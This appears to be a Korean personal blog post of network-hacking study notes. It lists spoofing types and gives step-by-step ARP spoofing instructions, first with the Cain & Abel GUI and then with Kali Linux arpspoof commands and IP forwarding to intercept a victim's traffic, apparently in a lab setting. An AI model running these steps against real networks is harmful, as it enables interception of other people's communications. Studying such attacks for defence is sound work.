네트워크 해킹 - 04. ARP Spoofing
by jennysgapSpoofing
1. MAC Spoofing
2. IP Spoofing (외부 시스템 공격, Dos)
3. TCP Sequence Guess (hijacking) : 공격이 안 될 확률이 높음
4. App (DNS) Spoofing
ARP spoofing
카인과 아벨 다운로드 → http://www.oxid.it/cain.html
Cain & abel
Cain & abel 실행 → 클릭
스니핑 창 클릭
'+' 클릭하거 or 마우스 오른쪽클릭 → 'Scan MAC Addresses' 클릭
Scan할 MAC Address 범위 설정 → OK 클릭
같은 네트워크망에 연결된 기기들이 스캔됨
스캔이 끝났다면 ARP 창 클릭
' + ' 클릭 → New ARP Poison Routing 창 확인
왼쪽에는 상대방_IP, 오른쪽에는 공유기 Gateway_IP 설정 (보통 끝에 .1로 끝남)
'start/stop ARP 클릭' 으로 스푸핑 시작!
Kali Linux - arp spoofing
<공격자>
# arpspoof -t 속일대상IP 속이고자하는IP (1번 명령창)
# arpspoof -t 10.10.0.x 10.10.0.xx
# arpspoof -t 속일대상IP 속이고자하는IP (2번 명령창)
# arpspoof -t 10.10.0.xx 10.10.0.x
# echo 1 > /proc/sys/net/ipv4/ip_forward 커널드라이브 파일임(열어서 보면 안됨! - 수정 오류시 파일 깨짐)
# cat /proc/sys/net/ipv4/ip_forward
<피해자>
# arp -a
<공격자> echo 1 > /proc/sys/net/ipv4/ip_forward
<피해자> arp -a
참고
• ARP 스푸핑 위키백과사전
'BOX' 카테고리의 다른 글
네트워크 해킹 - 06. DNS Spoofing (0) | 2016.12.06 |
---|---|
네트워크 해킹 - 05. Netbus (0) | 2016.12.06 |
네트워크 해킹 - 03. nmap을 이용한 스캐닝 (0) | 2016.12.02 |
네트워크 해킹 - 02. Super Scan을 이용한 스캐닝 (0) | 2016.12.02 |
네트워크 해킹 - 01. Footprinting 단계 (0) | 2016.12.02 |
블로그의 정보
jennysgap
jennysgap